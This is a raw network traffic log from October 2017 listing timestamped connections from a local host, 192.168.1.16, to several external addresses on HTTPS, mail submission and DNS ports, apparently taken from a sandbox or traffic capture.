Okt 17, 2017 21:54:29.012423038 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.012955904 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.012978077 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.012986898 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.013091087 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.014678955 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.014700890 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.014709949 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.014831066 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.018249035 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.018364906 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.019572020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.019594908 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.019603968 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.019953966 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.025377989 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.025734901 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.064389944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.064412117 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.064419985 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.064764023 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.079291105 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.079327106 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.079358101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.079668999 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.079693079 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.080106020 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.087114096 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.087136984 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.087352037 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.088080883 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088148117 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088159084 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088386059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088401079 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.088402987 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088598013 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.088599920 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088619947 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088632107 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.088653088 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.089179993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.089201927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.089250088 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.089270115 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.089559078 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.089581013 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.089967966 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.094291925 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.094314098 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.094321966 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.094383955 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.139909983 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.139934063 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.139941931 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.140008926 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.140135050 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.140198946 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.140494108 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.140512943 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.140644073 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.140815020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.140830040 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.140840054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.140991926 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.141498089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.141520023 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.141535044 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.141644001 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.142174006 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.142196894 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.142205000 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.142313957 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.142990112 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.143013000 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.143022060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.143094063 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.143112898 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.143404007 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.151125908 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.151134014 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.151138067 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.151352882 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.204508066 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.204530001 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.204538107 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.204747915 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.211731911 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.211905003 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.214138031 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.214159012 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.214394093 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.215152025 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.215173960 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.215182066 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.215344906 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.218914986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.218938112 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.218945980 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.219146967 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.333858013 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.333879948 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.333888054 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.334016085 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.340955973 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.341135979 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.352632999 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.352654934 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.352849007 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:29.793746948 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:29.793858051 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:30.008249044 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:54:30.008285046 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:30.008503914 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:54:30.015592098 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:54:30.015613079 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:30.022620916 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:30.022644043 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:30.023561954 MESZ49195443192.168.1.165.196.73.150
Okt 17, 2017 21:54:30.023587942 MESZ443491955.196.73.150192.168.1.16
Okt 17, 2017 21:54:30.024224043 MESZ49195443192.168.1.165.196.73.150
Okt 17, 2017 21:54:30.024694920 MESZ49195443192.168.1.165.196.73.150
Okt 17, 2017 21:54:30.024714947 MESZ443491955.196.73.150192.168.1.16
Okt 17, 2017 21:54:30.583451033 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:30.583476067 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:30.583483934 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:30.583689928 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:54:30.613219023 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:30.613241911 MESZ4434919493.180.157.92192.168.1.16
Okt 17, 2017 21:54:30.613444090 MESZ49194443192.168.1.1693.180.157.92
Okt 17, 2017 21:54:30.635329008 MESZ6222853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.638056993 MESZ5865953192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.640687943 MESZ5691753192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.643332005 MESZ6497053192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.646125078 MESZ5461853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.649480104 MESZ6239653192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.651622057 MESZ6363853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.653806925 MESZ5287753192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.656399012 MESZ5936253192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.656641006 MESZ443491955.196.73.150192.168.1.16
Okt 17, 2017 21:54:30.656763077 MESZ49195443192.168.1.165.196.73.150
Okt 17, 2017 21:54:30.696336985 MESZ5226153192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.698977947 MESZ6158553192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.701596022 MESZ5413753192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.704520941 MESZ5216553192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.707951069 MESZ5281453192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.710912943 MESZ5859853192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.713464022 MESZ6309953192.168.1.168.8.8.8
Okt 17, 2017 21:54:30.931807041 MESZ53622288.8.8.8192.168.1.16
Okt 17, 2017 21:54:30.953607082 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:30.953661919 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:30.956495047 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:30.956731081 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:30.956748009 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:30.967278957 MESZ53569178.8.8.8192.168.1.16
Okt 17, 2017 21:54:30.967890978 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:30.967912912 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:30.968487024 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:30.968656063 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:30.968672037 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:30.976207972 MESZ53522618.8.8.8192.168.1.16
Okt 17, 2017 21:54:30.976831913 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:30.976854086 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:30.980499029 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:30.980664968 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:30.980679989 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.003207922 MESZ53615858.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.003823996 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.003845930 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.004489899 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.004719019 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.004734039 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.012145996 MESZ53541378.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.012770891 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.012792110 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.016246080 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.016500950 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.016516924 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.025614977 MESZ53521658.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.026267052 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.026288033 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.026691914 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.026943922 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.026959896 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.178567886 MESZ53528148.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.181058884 MESZ492023535192.168.1.16173.201.192.101
Okt 17, 2017 21:54:31.181082010 MESZ353549202173.201.192.101192.168.1.16
Okt 17, 2017 21:54:31.181636095 MESZ492023535192.168.1.16173.201.192.101
Okt 17, 2017 21:54:31.193166018 MESZ53585988.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.193416119 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.193434000 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.193445921 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.193938017 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.194135904 MESZ49203465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.194156885 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.194250107 MESZ49203465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.194504023 MESZ49203465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.194529057 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.197746038 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.197762012 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.211687088 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.211714983 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.211817980 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.226563931 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.228408098 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.228454113 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.228501081 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.228581905 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.230650902 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.230665922 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.233697891 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.233937025 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.233952999 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.275908947 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.276319981 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.276345968 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.276407957 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.276417017 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.276441097 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.277024031 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.281604052 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.281627893 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.283427954 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.288098097 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.288120031 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.307306051 MESZ53593628.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307351112 MESZ53528778.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307377100 MESZ53636388.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307403088 MESZ53623968.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307426929 MESZ53546188.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307451963 MESZ53649708.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.307482004 MESZ53586598.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.308521032 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.308558941 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.308629990 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.309767962 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.309802055 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.309892893 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.310956955 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.310988903 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.311101913 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.312077999 MESZ49207587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.312109947 MESZ5874920740.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.312525034 MESZ49207587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.312897921 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.312927008 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.313610077 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.313628912 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.313689947 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.314243078 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.314270973 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.314336061 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.314743042 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.351085901 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:31.351105928 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:31.351653099 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:31.363368034 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:31.363390923 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:31.363790035 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:31.370234013 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:31.377190113 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:31.377218962 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:31.399878979 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.401114941 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.401567936 MESZ49203465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.401590109 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.406398058 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.409375906 MESZ49203465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.409401894 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.423110008 MESZ53630998.8.8.8192.168.1.16
Okt 17, 2017 21:54:31.424575090 MESZ49211587192.168.1.16217.119.50.35
Okt 17, 2017 21:54:31.424614906 MESZ58749211217.119.50.35192.168.1.16
Okt 17, 2017 21:54:31.425192118 MESZ49211587192.168.1.16217.119.50.35
Okt 17, 2017 21:54:31.442163944 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.472170115 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.472198009 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.479345083 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.514163017 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.514194965 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.519229889 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.519267082 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.519426107 MESZ49204587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.519448996 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.524420023 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.524458885 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.524640083 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.524662018 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.529042959 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.532640934 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.532666922 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.533030033 MESZ49206587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.533049107 MESZ5874920640.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.536207914 MESZ5874920740.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.536237955 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.539952993 MESZ49207587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.539979935 MESZ5874920740.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.540519953 MESZ49207587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.540539026 MESZ5874920740.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.543598890 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.543616056 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.543739080 MESZ49208587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.543755054 MESZ5874920840.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.579010010 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.586153030 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.606100082 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.606116056 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.607485056 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.607498884 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.608481884 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.608653069 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.615247011 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.615262985 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.615422010 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.615432978 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.615633011 MESZ49210587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.615647078 MESZ5874921040.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.615712881 MESZ49197465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.615722895 MESZ4654919774.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.616424084 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.617140055 MESZ49203465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.617165089 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.617352009 MESZ49203465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.617367029 MESZ4654920374.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.644453049 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.644669056 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.644886017 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.644918919 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.645034075 MESZ49198465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.645050049 MESZ4654919874.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.653433084 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:31.672482967 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.672506094 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.672724962 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.672774076 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.672969103 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.672992945 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.673243046 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.673263073 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.673377037 MESZ49199465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.673394918 MESZ4654919974.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.673516989 MESZ49201465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.673533916 MESZ4654920174.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.678271055 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.678307056 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.678620100 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.678653955 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.679073095 MESZ49200465192.168.1.1674.125.205.108
Okt 17, 2017 21:54:31.679099083 MESZ4654920074.125.205.108192.168.1.16
Okt 17, 2017 21:54:31.689789057 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.700428963 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.700453997 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.700545073 MESZ49205587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.700557947 MESZ5874920540.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.764830112 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.771373034 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.771395922 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.771748066 MESZ49209587192.168.1.1640.101.48.82
Okt 17, 2017 21:54:31.771764040 MESZ5874920940.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.785228014 MESZ5874920440.101.48.82192.168.1.16
Okt 17, 2017 21:54:31.791237116 MESZ49204587192.168.1.1640.101.48.82
